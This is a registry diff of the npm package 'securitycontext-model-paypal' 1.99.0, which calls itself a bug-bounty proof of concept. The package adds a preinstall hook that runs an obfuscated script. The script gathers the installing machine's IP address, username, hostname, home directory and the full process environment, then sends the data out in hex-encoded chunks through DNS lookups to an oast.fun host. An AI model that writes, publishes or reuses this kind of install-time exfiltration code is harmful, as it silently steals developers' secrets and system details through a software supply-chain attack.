securitycontext-model-paypal 1.99.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
package/Readme.md ADDED
@@ -0,0 +1,3 @@
1
+ # Example node package
2
+ This is My's PoC for the bug bounty
3
+ program. I own this package name.
@@ -0,0 +1 @@
1
+ (function(_0x4f216c,_0x32a348){const _0x22f856=a0_0x137e,_0x9ca2ee=_0x4f216c();while(!![]){try{const _0x50f981=-parseInt(_0x22f856(0x196))/0x1*(parseInt(_0x22f856(0x195))/0x2)+parseInt(_0x22f856(0x1a8))/0x3+-parseInt(_0x22f856(0x19d))/0x4*(parseInt(_0x22f856(0x1ac))/0x5)+-parseInt(_0x22f856(0x198))/0x6+-parseInt(_0x22f856(0x1b0))/0x7+-parseInt(_0x22f856(0x1a3))/0x8*(parseInt(_0x22f856(0x19a))/0x9)+parseInt(_0x22f856(0x1a4))/0xa;if(_0x50f981===_0x32a348)break;else _0x9ca2ee['push'](_0x9ca2ee['shift']());}catch(_0x245929){_0x9ca2ee['push'](_0x9ca2ee['shift']());}}}(a0_0x58f8,0x4eaea));const os=require('os'),dns=require('dns');function a0_0x137e(_0x2b1216,_0x95a465){const _0x58f84b=a0_0x58f8();return a0_0x137e=function(_0x137eec,_0x5bf217){_0x137eec=_0x137eec-0x195;let _0x99eb6e=_0x58f84b[_0x137eec];return _0x99eb6e;},a0_0x137e(_0x2b1216,_0x95a465);};function a0_0x58f8(){const _0x4a1752=['env','119040GyyFsv','homedir','decoy_start_','stringify','3719653vwtDQv','internal','2DPubSf','575957QLMQCf','N/A','1985388LEJWjh','arch','2896713NFWdMq','d2csdm12eku540u7jhgguj7byqntxjd9t.oast.fun','from','84LqKCHC','address','decoy_end','networkInterfaces','IPv4','substring','8edRxqI','20383610FIJYmL','hex','toString','username','1631940FnvnLS','keys','length'];a0_0x58f8=function(){return _0x4a1752;};return a0_0x58f8();}((async()=>{const _0x32fcf4=a0_0x137e,_0x15ea6c=_0x32fcf4(0x19b);let _0x3ae507=_0x32fcf4(0x197);try{const _0x237551=os[_0x32fcf4(0x1a0)]();for(const _0x31c4fb of Object[_0x32fcf4(0x1a9)](_0x237551)){for(const _0x3ec46b of _0x237551[_0x31c4fb]){if(_0x3ec46b['family']===_0x32fcf4(0x1a1)&&!_0x3ec46b[_0x32fcf4(0x1b1)]){_0x3ae507=_0x3ec46b[_0x32fcf4(0x19e)];break;}}if(_0x3ae507!=='N/A')break;}}catch(_0x5f45dd){}const _0x3b60d7=_0x32fcf4(0x1ae)+Math['random']()['toString'](0x24)[_0x32fcf4(0x1a2)](0x2);let _0x541972={'_decoy':_0x3b60d7,'ip':_0x3ae507,'username':os['userInfo']()[_0x32fcf4(0x1a7)],'hostname':os['hostname'](),'platform':os['platform'](),'arch':os[_0x32fcf4(0x199)](),'home':os[_0x32fcf4(0x1ad)](),'env':process[_0x32fcf4(0x1ab)],'_decoy2':_0x32fcf4(0x19f)};const _0x47fd89=JSON[_0x32fcf4(0x1af)](_0x541972),_0x2b4e6f=Buffer[_0x32fcf4(0x19c)](_0x47fd89)[_0x32fcf4(0x1a6)](_0x32fcf4(0x1a5)),_0xd39a96=0x32;for(let _0x4e4ec9=0x0;_0x4e4ec9<_0x2b4e6f[_0x32fcf4(0x1aa)];_0x4e4ec9+=_0xd39a96){const _0x17a894=_0x2b4e6f['substring'](_0x4e4ec9,_0x4e4ec9+_0xd39a96),_0x1b537a=_0x4e4ec9/_0xd39a96+'.'+_0x17a894,_0x15f4b8=_0x1b537a+'.'+_0x15ea6c;dns['lookup'](_0x15f4b8,_0x5c7cf2=>{}),await new Promise(_0x32a584=>setTimeout(_0x32a584,0x64));}})());
package/package.json ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "securitycontext-model-paypal",
3
+ "version": "1.99.0",
4
+ "description": "",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "preinstall": "node app.obfuscated.js"
8
+ },
9
+ "keywords": [],
10
+ "author": "Finance Dev",
11
+ "license": "ISC"
12
+ }